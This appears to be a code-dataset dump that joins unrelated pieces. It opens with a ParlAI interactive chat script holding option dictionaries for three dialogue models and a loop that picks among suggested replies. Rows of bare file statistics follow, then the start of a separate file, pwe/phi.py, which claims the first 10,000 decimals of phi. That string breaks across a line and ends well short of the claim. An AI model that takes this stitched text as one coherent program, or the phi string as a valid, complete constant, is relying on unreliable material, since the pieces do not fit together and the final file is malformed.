'cap_num_predictions': 100, 'ignore_bad_candidates': False, 'rank_top_k': -1, 'inference': 'max', 'topk': 5, 'return_cand_scores': False, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'use_memories': False, 'wrap_memory_encoder': False, 'memory_attention': 'sqrt', 'normalize_sent_emb': False, 'share_encoders': True, 'share_word_embeddings': True, 'learn_embeddings': True, 'data_parallel': False, 'reduction_type': 'mean', 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'polyencoder_type': 'codes', 'poly_n_codes': 64, 'poly_attention_type': 'basic', 'poly_attention_num_heads': 4, 'codes_attention_type': 'basic', 'codes_attention_num_heads': 4, 'display_partner_persona': True, 'parlai_home': '/home/tatiana/ParlAI', 'override': {'model_file': '/home/tatiana/ParlAI/data/models/pretrained_transformers/model_poly/model', 'task': 'convai2'}, 'starttime': 'Aug24_12-51'}
# Interactive options for the dodecadialogue ConvAI2 fine-tuned model.
# Fixes: 'ultitask_weights' typo -> 'multitask_weights'; stray leading space
# in dict_endtoken value; validation_metric_mode stored the builtin `min`
# function instead of the string 'min'.
# NOTE(review): paths are machine-specific; verify before deployment.
opt_convai = {
    'activation': 'gelu',
    'adafactor_eps': '(1e-30, 0.001)',
    'adam_eps': 1e-08,
    'add_p1_after_newln': False,
    'aggregate_micro': False,
    'attention_dropout': 0.0,
    'batch_length_range': 5,
    'batch_sort_cache_type': 'pop',
    'batch_sort_field': 'ext',
    'batchsize': 16,
    'beam_block_full_context': False,
    'beam_block_list_filename': None,
    'beam_block_ngram': -1,
    'beam_context_block_ngram': -1,
    'beam_delay': 30,
    'beam_length_penalty': 0.65,
    'beam_min_length': 1,
    'beam_size': 1,
    'betas': [0.9, 0.999],
    'bpe_add_prefix_space': None,
    'bpe_debug': False,
    'bpe_merge': None,
    'bpe_vocab': None,
    'compute_tokenized_bleu': False,
    'datapath': '/home/tatiana/.local/lib/python3.8/site-packages/data',
    'datatype': 'train',
    'delimiter': '\n',
    'dict_class': 'parlai.core.dict:DictionaryAgent',
    'dict_endtoken': '__end__',  # was ' __end__' (stray leading space)
    'dict_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/convai2_ft/model.dict',
    'dict_include_test': False,
    'dict_include_valid': False,
    'dict_initpath': None,
    'dict_language': 'english',
    'dict_loaded': True,
    'dict_lower': True,
    'dict_max_ngram_size': -1,
    'dict_maxexs': -1,
    'dict_maxtokens': -1,
    'dict_minfreq': 0,
    'dict_nulltoken': '__null__',
    'dict_starttoken': '__start__',
    'dict_textfields': 'text,labels',
    'dict_tokenizer': 'bpe',
    'dict_unktoken': '__unk__',
    'display_examples': False,
    'display_ignore_fields': 'label_candidates,text_candidates',
    'display_partner_persona': True,
    'display_prettify': False,
    'download_path': '/home/tatiana/.local/lib/python3.8/site-packages/downloads',
    'dropout': 0.1,
    'dynamic_batching': None,
    'embedding_projection': 'random',
    'embedding_size': 512,
    'embedding_type': 'random',
    'embeddings_scale': True,
    'eval_batchsize': None,
    'evaltask': None,
    'ffn_size': 2048,
    'force_fp16_tokens': False,
    'fp16': False,
    'fp16_impl': 'apex',
    'gpu': -1,
    'gradient_clip': 0.1,
    'hf_skip_special_tokens': True,
    'hide_labels': False,
    'history_add_global_end_token': None,
    'history_reversed': False,
    'history_size': -1,
    'image_cropsize': 224,
    'image_encoder_num_layers': 1,
    'image_features_dim': 2048,
    'image_fusion_type': 'late',
    'image_mode': None,
    'image_size': 256,
    'include_image_token': True,
    'inference': 'greedy',
    'init_model': 'data/models/dodecadialogue/base_model/model',
    'init_opt': None,
    'interactive_mode': True,
    'interactive_task': True,
    'invsqrt_lr_decay_gamma': -1,
    'label_truncate': 128,
    'learn_positional_embeddings': True,
    'learningrate': 1e-08,
    'load_from_checkpoint': True,
    'local_human_candidates_file': None,
    'log_every_n_secs': 10.0,
    'log_keep_fields': 'all',
    'loglevel': 'info',
    'lr_scheduler': 'reduceonplateau',
    'lr_scheduler_decay': 0.5,
    'lr_scheduler_patience': 3,
    'max_lr_steps': -1,
    'max_train_time': 84600.0,
    'metrics': 'default',
    'model': 'image_seq2seq',
    'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/convai2_ft/model',
    'model_parallel': False,
    'momentum': 0,
    'multitask_weights': [1],  # was misspelled 'ultitask_weights'
    'n_decoder_layers': -1,
    'n_encoder_layers': -1,
    'n_heads': 16,
    'n_image_channels': 1,
    'n_image_tokens': 1,
    'n_layers': 8,
    'n_positions': 512,
    'n_segments': 0,
    'nesterov': True,
    'no_cuda': False,
    'num_epochs': -1,
    'numthreads': 1,
    'numworkers': 4,
    'nus': [0.7],
    'optimizer': 'adamax',
    'outfile': None,
    'output_scaling': 1.0,
    'override': {'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/convai2_ft/model', 'task': 'convai2'},
    'parlai_home': '/checkpoint/kshuster/projects/parlall/parlall_MT_plus_FT/parlall_MT_plus_FT_sweep1_Tue_Oct_29/ParlAI',
    'person_tokens': False,
    'pytorch_context_length': -1,
    'pytorch_datapath': None,
    'pytorch_include_labels': True,
    'pytorch_preprocess': False,
    'pytorch_teacher_batch_sort': False,
    'pytorch_teacher_dataset': None,
    'pytorch_teacher_task': None,
    'rank_candidates': False,
    'relu_dropout': 0.0,
    'save_after_valid': True,
    'save_every_n_secs': -1,
    'save_format': 'conversations',
    'share_word_embeddings': True,
    'short_final_eval': False,
    'show_advanced_args': False,
    'shuffle': False,
    'single_turn': False,
    'skip_generation': True,
    'special_tok_lst': None,
    'split_lines': False,
    'starttime': 'Oct29_07-56',
    'task': 'convai2',
    'temperature': 1.0,
    'tensorboard_log': False,
    'text_truncate': 512,
    'topk': 10,
    'topp': 0.9,
    'truncate': -1,
    'update_freq': 1,
    'use_reply': 'label',
    'validation_cutoff': 1.0,
    'validation_every_n_epochs': -1,
    'validation_every_n_secs': 3600.0,
    'validation_max_exs': -1,
    'validation_metric': 'ppl',
    'validation_metric_mode': 'min',  # was the builtin function `min`, not a string
    'validation_patience': 10,
    'validation_share_agent': False,
    'variant': 'xlm',
    'warmup_rate': 0.0001,
    'warmup_updates': 2000,
    'weight_decay': None
}
#python parlai interactive -mf zoo:dodecadialogue/empathetic_dialogues_ft/model
#opt_ed = {'init_opt': None, 'task': 'interactive', 'download_path': '/home/tatiana/ParlAI/downloads', 'loglevel': 'info', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/ParlAI/data', 'model': None, 'model_file': '/home/tatiana/ParlAI/data/models/dodecadialogue/empathetic_dialogues_ft/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'outfile': '', 'save_format': 'conversations', 'local_human_candidates_file': None, 'single_turn': False, 'log_keep_fields': 'all', 'image_size': 256, 'image_cropsize': 224, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'share_word_embeddings': True, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'beam_size': 1, 'beam_min_length': 1, 'beam_context_block_ngram': -1, 'beam_block_ngram': -1, 'beam_block_full_context': True, 'beam_length_penalty': 0.65, 'skip_generation': False, 'inference': 'greedy', 'topk': 10, 'topp': 0.9, 'beam_delay': 30, 'beam_block_list_filename': None, 'temperature': 1.0, 'compute_tokenized_bleu': False, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'sgd', 'learningrate': 1, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': -1, 'text_truncate': None, 'label_truncate': None, 'history_reversed': 
False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'image_features_dim': 2048, 'image_encoder_num_layers': 1, 'n_image_tokens': 1, 'n_image_channels': 1, 'include_image_token': True, 'image_fusion_type': 'late', 'parlai_home': '/home/tatiana/ParlAI', 'override': {'model_file': '/home/tatiana/ParlAI/data/models/dodecadialogue/empathetic_dialogues_ft/model'}, 'starttime': 'Aug24_14-42'}
# Interactive options for the dodecadialogue EmpatheticDialogues fine-tuned
# model. Same fixes as opt_convai: 'ultitask_weights' typo ->
# 'multitask_weights'; stray leading space in dict_endtoken; the builtin
# `min` function replaced with the string 'min'.
# NOTE(review): paths are machine-specific; verify before deployment.
opt_ed = {
    'activation': 'gelu',
    'adafactor_eps': '(1e-30, 0.001)',
    'adam_eps': 1e-08,
    'add_p1_after_newln': False,
    'aggregate_micro': False,
    'attention_dropout': 0.0,
    'batch_length_range': 5,
    'batch_sort_cache_type': 'pop',
    'batch_sort_field': 'ext',
    'batchsize': 16,
    'beam_block_full_context': False,
    'beam_block_list_filename': None,
    'beam_block_ngram': -1,
    'beam_context_block_ngram': -1,
    'beam_delay': 30,
    'beam_length_penalty': 0.65,
    'beam_min_length': 1,
    'beam_size': 1,
    'betas': [0.9, 0.999],
    'bpe_add_prefix_space': None,
    'bpe_debug': False,
    'bpe_merge': None,
    'bpe_vocab': None,
    'compute_tokenized_bleu': False,
    'datapath': '/home/tatiana/.local/lib/python3.8/site-packages/data',
    'datatype': 'train',
    'delimiter': '\n',
    'dict_class': 'parlai.core.dict:DictionaryAgent',
    'dict_endtoken': '__end__',  # was ' __end__' (stray leading space)
    'dict_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/empathetic_dialogues_ft/model.dict',
    'dict_include_test': False,
    'dict_include_valid': False,
    'dict_initpath': None,
    'dict_language': 'english',
    'dict_loaded': True,
    'dict_lower': True,
    'dict_max_ngram_size': -1,
    'dict_maxexs': -1,
    'dict_maxtokens': -1,
    'dict_minfreq': 0,
    'dict_nulltoken': '__null__',
    'dict_starttoken': '__start__',
    'dict_textfields': 'text,labels',
    'dict_tokenizer': 'bpe',
    'dict_unktoken': '__unk__',
    'display_examples': False,
    'display_ignore_fields': 'label_candidates,text_candidates',
    'display_partner_persona': True,
    'display_prettify': False,
    'download_path': '/home/tatiana/.local/lib/python3.8/site-packages/downloads',
    'dropout': 0.1,
    'dynamic_batching': None,
    'embedding_projection': 'random',
    'embedding_size': 512,
    'embedding_type': 'random',
    'embeddings_scale': True,
    'eval_batchsize': None,
    'evaltask': None,
    'ffn_size': 2048,
    'force_fp16_tokens': False,
    'fp16': False,
    'fp16_impl': 'apex',
    'gpu': -1,
    'gradient_clip': 0.1,
    'hf_skip_special_tokens': True,
    'hide_labels': False,
    'history_add_global_end_token': None,
    'history_reversed': False,
    'history_size': -1,
    'image_cropsize': 224,
    'image_encoder_num_layers': 1,
    'image_features_dim': 2048,
    'image_fusion_type': 'late',
    'image_mode': None,
    'image_size': 256,
    'include_image_token': True,
    'inference': 'greedy',
    'init_model': 'data/models/dodecadialogue/base_model/model',
    'init_opt': None,
    'interactive_mode': True,
    'interactive_task': True,
    'invsqrt_lr_decay_gamma': -1,
    'label_truncate': 128,
    'learn_positional_embeddings': True,
    'learningrate': 1e-08,
    'load_from_checkpoint': True,
    'local_human_candidates_file': None,
    'log_every_n_secs': 10.0,
    'log_keep_fields': 'all',
    'loglevel': 'info',
    'lr_scheduler': 'reduceonplateau',
    'lr_scheduler_decay': 0.5,
    'lr_scheduler_patience': 3,
    'max_lr_steps': -1,
    'max_train_time': 84600.0,
    'metrics': 'default',
    'model': 'image_seq2seq',
    'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/empathetic_dialogues_ft/model',
    'model_parallel': False,
    'momentum': 0,
    'multitask_weights': [1],  # was misspelled 'ultitask_weights'
    'n_decoder_layers': -1,
    'n_encoder_layers': -1,
    'n_heads': 16,
    'n_image_channels': 1,
    'n_image_tokens': 1,
    'n_layers': 8,
    'n_positions': 512,
    'n_segments': 0,
    'nesterov': True,
    'no_cuda': False,
    'num_epochs': -1,
    'numthreads': 1,
    'numworkers': 4,
    'nus': [0.7],
    'optimizer': 'adamax',
    'outfile': None,
    'output_scaling': 1.0,
    'override': {'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/empathetic_dialogues_ft/model'},
    'parlai_home': '/checkpoint/kshuster/projects/parlall/parlall_MT_plus_FT/parlall_MT_plus_FT_sweep1_Tue_Oct_29/ParlAI',
    'person_tokens': False,
    'pytorch_context_length': -1,
    'pytorch_datapath': None,
    'pytorch_include_labels': True,
    'pytorch_preprocess': False,
    'pytorch_teacher_batch_sort': False,
    'pytorch_teacher_dataset': None,
    'pytorch_teacher_task': None,
    'rank_candidates': False,
    'relu_dropout': 0.0,
    'save_after_valid': True,
    'save_every_n_secs': -1,
    'save_format': 'conversations',
    'share_word_embeddings': True,
    'short_final_eval': False,
    'show_advanced_args': False,
    'shuffle': False,
    'single_turn': False,
    'skip_generation': True,
    'special_tok_lst': None,
    'split_lines': False,
    'starttime': 'Oct29_07-56',
    'task': 'convai2',
    'temperature': 1.0,
    'tensorboard_log': False,
    'text_truncate': 512,
    'topk': 10,
    'topp': 0.9,
    'truncate': -1,
    'update_freq': 1,
    'use_reply': 'label',
    'validation_cutoff': 1.0,
    'validation_every_n_epochs': -1,
    'validation_every_n_secs': 3600.0,
    'validation_max_exs': -1,
    'validation_metric': 'ppl',
    'validation_metric_mode': 'min',  # was the builtin function `min`, not a string
    'validation_patience': 10,
    'validation_share_agent': False,
    'variant': 'xlm',
    'warmup_rate': 0.0001,
    'warmup_updates': 2000,
    'weight_decay': None
}
# python parlai interactive -mf zoo:blended_skill_talk/bst_single_task/model -t blended_skill_talk
#opt_bst = {'init_opt': None, 'task': 'blended_skill_talk', 'download_path': '/home/tatiana/ParlAI/downloads', 'loglevel': 'info', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/ParlAI/data', 'model': None, 'model_file': '/home/tatiana/ParlAI/data/models/blended_skill_talk/bst_single_task/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'outfile': '', 'save_format': 'conversations', 'local_human_candidates_file': None, 'single_turn': False, 'log_keep_fields': 'all', 'image_size': 256, 'image_cropsize': 224, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'adamax', 'learningrate': 0.0001, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': 1024, 'text_truncate': None, 'label_truncate': None, 'history_reversed': False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'candidates': 'inline', 'eval_candidates': 'inline', 'interactive_candidates': 'fixed', 'repeat_blocking_heuristic': True, 'fixed_candidates_path': None, 'fixed_candidate_vecs': 'reuse', 'encode_candidate_vecs': True, 'encode_candidate_vecs_batchsize': 256, 'train_predict': False, 
'cap_num_predictions': 100, 'ignore_bad_candidates': False, 'rank_top_k': -1, 'inference': 'max', 'topk': 5, 'return_cand_scores': False, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'use_memories': False, 'wrap_memory_encoder': False, 'memory_attention': 'sqrt', 'normalize_sent_emb': False, 'share_encoders': True, 'share_word_embeddings': True, 'learn_embeddings': True, 'data_parallel': False, 'reduction_type': 'mean', 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'polyencoder_type': 'codes', 'poly_n_codes': 64, 'poly_attention_type': 'basic', 'poly_attention_num_heads': 4, 'codes_attention_type': 'basic', 'codes_attention_num_heads': 4, 'display_partner_persona': True, 'include_personas': True, 'include_initial_utterances': False, 'safe_personas_only': True, 'parlai_home': '/home/tatiana/ParlAI', 'override': {'model_file': '/home/tatiana/ParlAI/data/models/blended_skill_talk/bst_single_task/model', 'task': 'blended_skill_talk'}, 'starttime': 'Aug24_13-01'}
# Interactive options for the blender_90M model on blended_skill_talk,
# kept as the original single-expression dump to avoid transcription errors.
# NOTE(review): despite the name opt_bst, 'model_file' points at
# blender/blender_90M, not blended_skill_talk/bst_single_task — confirm intended.
opt_bst = {'init_opt': None, 'task': 'blended_skill_talk', 'download_path': '/home/tatiana/.local/lib/python3.8/site-packages/downloads', 'loglevel': 'info', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/.local/lib/python3.8/site-packages/data', 'model': None, 'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/blender/blender_90M/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'safety': 'all', 'local_human_candidates_file': None, 'single_turn': False, 'image_size': 256, 'image_cropsize': 224, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'share_word_embeddings': True, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'beam_size': 1, 'beam_min_length': 1, 'beam_context_block_ngram': -1, 'beam_block_ngram': -1, 'beam_block_full_context': True, 'beam_length_penalty': 0.65, 'skip_generation': False, 'inference': 'greedy', 'topk': 10, 'topp': 0.9, 'beam_delay': 30, 'beam_block_list_filename': None, 'temperature': 1.0, 'compute_tokenized_bleu': False, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'sgd', 'learningrate': 1, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': -1, 'text_truncate': None, 'label_truncate': None, 
'history_reversed': False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'display_partner_persona': True, 'include_personas': True, 'include_initial_utterances': False, 'safe_personas_only': True, 'parlai_home': '/home/tatiana/.local/lib/python3.8/site-packages', 'override': {'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/blender/blender_90M/model', 'task': 'blended_skill_talk'}, 'starttime': 'Aug26_02-41'}
#python parlai/scripts/interactive.py -mf zoo:dialogue_unlikelihood/rep_wiki_ctxt_and_label/model -m projects.dialogue_unlikelihood.agents:RepetitionUnlikelihoodAgent
def setup_args(parser=None):
    """Build (or extend) the command-line parser for interactive chat.

    If no parser is supplied, a default ParlaiParser is created; agent
    and logger command-line options are then attached to it.
    """
    if parser is None:
        parser = ParlaiParser(
            True, True, 'Interactive chat with a model on the command line'
        )
    parser.add_argument('-d', '--display-examples', type='bool', default=False)
    parser.set_defaults(interactive_mode=True, task='interactive')
    # Register the extra option groups contributed by each component.
    for component in (LocalHumanAgent, WorldLogger):
        component.add_cmdline_args(parser)
    return parser
def interactive(opt):
    """Run the ImperialQuips suggestion loop on the command line.

    Creates one agent per persona model, repeatedly collects suggestions
    for each human input, and lets the user pick (and optionally
    personalise) one of them. Typing ``EXIT`` ends the loop.

    Args:
        opt: parsed options dict (a ParlaiParser is tolerated but logged
            as an error and parsed on the spot).
    """
    if isinstance(opt, ParlaiParser):
        logging.error('interactive should be passed opt not Parser')
        opt = opt.parse_args()
    # Create model and assign it to the specified task
    human_agent = LocalHumanAgent(opt_convai)
    convai_agent = create_agent(opt_convai, requireModelExists=True)
    ed_agent = create_agent(opt_ed, requireModelExists=True)
    bst_agent = create_agent(opt_bst, requireModelExists=True)
    models = [convai_agent, ed_agent, bst_agent]
    labels = ['CONVAI2', 'EMPATHETIC_DIALOGUES', 'BLENDED_SKILL_TALK']
    imperial_quips = ImperialQuipWorld(human_agent, models, labels)
    keep_suggesting = True
    while keep_suggesting:
        suggestions = imperial_quips.parley()
        selection = input("Choose suggestion: ")
        # Robustness fix: a non-numeric or out-of-range choice used to crash
        # with ValueError/IndexError; fall back to the first suggestion.
        try:
            chosen = suggestions[int(selection) - 1]
        except (ValueError, IndexError):
            print("Invalid selection; defaulting to suggestion 1.")
            chosen = suggestions[0]
        modification = input("Do you wish to modify the selected response? (y/n): ")
        if modification == 'y':
            personalise_message.personalise_message(chosen)
        else:
            print("Response: " + chosen)
        user_input = input("")
        if user_input == "EXIT":
            keep_suggesting = False
@register_script('interactive', aliases=['i'])
class Interactive(ParlaiScript):
    """ParlAI script entry point wrapping the interactive() loop."""

    @classmethod
    def setup_args(cls):
        # Delegates to the module-level setup_args() with a fresh parser.
        return setup_args()

    def run(self):
        # self.opt is populated by ParlaiScript from the parsed arguments.
        return interactive(self.opt)
if __name__ == '__main__':
    # Fixed seed so any random choices made by agents are reproducible runs.
    random.seed(42)
    Interactive.main()
| 58.915929
| 3,700
| 0.727901
| 3,600
| 26,630
| 5.031389
| 0.127222
| 0.018219
| 0.00795
| 0.015735
| 0.869376
| 0.861426
| 0.856015
| 0.847016
| 0.843096
| 0.843096
| 0
| 0.030792
| 0.092677
| 26,630
| 451
| 3,701
| 59.046563
| 0.718856
| 0.413068
| 0
| 0.791045
| 0
| 0.019901
| 0.55436
| 0.194199
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0.002488
| 0.027363
| 0.004975
| 0.062189
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c122c71ad163dbaa76fec16d6ceef8f30adb916
| 13,405
|
py
|
Python
|
pwe/phi.py
|
Saran33/pwe_analysis
|
f966c7b5f0da4a0a6d3725c6bc3fe7b54d44e53a
|
[
"MIT"
] | null | null | null |
pwe/phi.py
|
Saran33/pwe_analysis
|
f966c7b5f0da4a0a6d3725c6bc3fe7b54d44e53a
|
[
"MIT"
] | null | null | null |
pwe/phi.py
|
Saran33/pwe_analysis
|
f966c7b5f0da4a0a6d3725c6bc3fe7b54d44e53a
|
[
"MIT"
] | 1
|
2022-01-24T10:56:40.000Z
|
2022-01-24T10:56:40.000Z
|
# First 10,000 Decimals of Phi (φ)
φ = "1.6180339887498948482045868343656381177203091798057628621354486227052604628189024497072072041893911374847540880753868917521266338622235369317931800607667263544333890865959395829056383226613199282902678806752087668925017116962070322210432162695486262963136144381497587012203408058879544547492461856953648644492410443207713449470495658467885098743394422125448770664780915884607499887124007652170575179788341662562494075890697040002812104276217711177780531531714101170466659914669798731761356006708748071013179523689427521948435305678300228785699782977834784587822891109762500302696156170025046433824377648610283831268330372429267526311653392473167111211588186385133162038400522216579128667529465490681131715993432359734949850904094762132229810172610705961164562990981629055520852479035240602017279974717534277759277862561943208275051312181562855122248093947123414517022373580577278616008688382952304592647878017889921990270776903895321968198615143780314997411069260886742962267575605231727775203536139362107673893764556060605921658946675955190040055590895022953094231248235521221241544400647034056573479766397239494994658457887303962309037503399385621024236902513868041457799569812244574717803417312645322041639723213404444948730231541767689375210306873788034417009395440962795589867872320951242689355730970450959568440175551988192180206405290551893494759260073485228210108819464454422231889131929468962200230144377026992300780308526118075451928877050210968424936271359251876077788466583615023891349333312231053392321362431926372891067050339928226526355620902979864247275977256550861548754357482647181414512700060238901620777322449943530889990950168032811219432048196438767586331479857191139781539780747615077221175082694586393204565209896985556781410696837288405874610337810544439094368358358138113116899385557697548414914453415091295407005019477548616307542264172939468036731980586183391832859913039607201445595044977921207612478564591616083705949878600697018940988640076443617093341727091914336
50137157660114803814306262380514321173481510055901345610118007905063814215270930858809287570345050780814545881990633612982798141174533927312080928972792221329806429468782427487401745055406778757083237310975915117762978443284747908176518097787268416117632503861211291436834376702350371116330725869883258710336322238109809012110198991768414917512331340152733843837234500934786049792945991582201258104598230925528721241370436149102054718554961180876426576511060545881475604431784798584539731286301625448761148520217064404111660766950597757832570395110878230827106478939021115691039276838453863333215658296597731034360323225457436372041244064088826737584339536795931232213437320995749889469956564736007295999839128810319742631251797141432012311279551894778172691415891177991956481255800184550656329528598591000908621802977563789259991649946428193022293552346674759326951654214021091363018194722707890122087287361707348649998156255472811373479871656952748900814438405327483781378246691744422963491470815700735254570708977267546934382261954686153312095335792380146092735102101191902183606750973089575289577468142295433943854931553396303807291691758461014609950550648036793041472365720398600735507609023173125016132048435836481770484818109916024425232716721901893345963786087875287017393593030133590112371023917126590470263494028307668767436386513271062803231740693173344823435645318505813531085497333507599667787124490583636754132890862406324563953572125242611702780286560432349428373017255744058372782679960317393640132876277012436798311446436947670531272492410471670013824783128656506493434180390041017805339505877245866557552293915823970841772983372823115256926092995942240000560626678674357923972454084817651973436265268944888552720274778747335983536727761407591712051326934483752991649980936024617844267572776790019191907038052204612324823913261043271916845123060236278935454324617699757536890417636502547851382463146583363833760235778992672988632161858395903639981838458276449124598093704305555961379
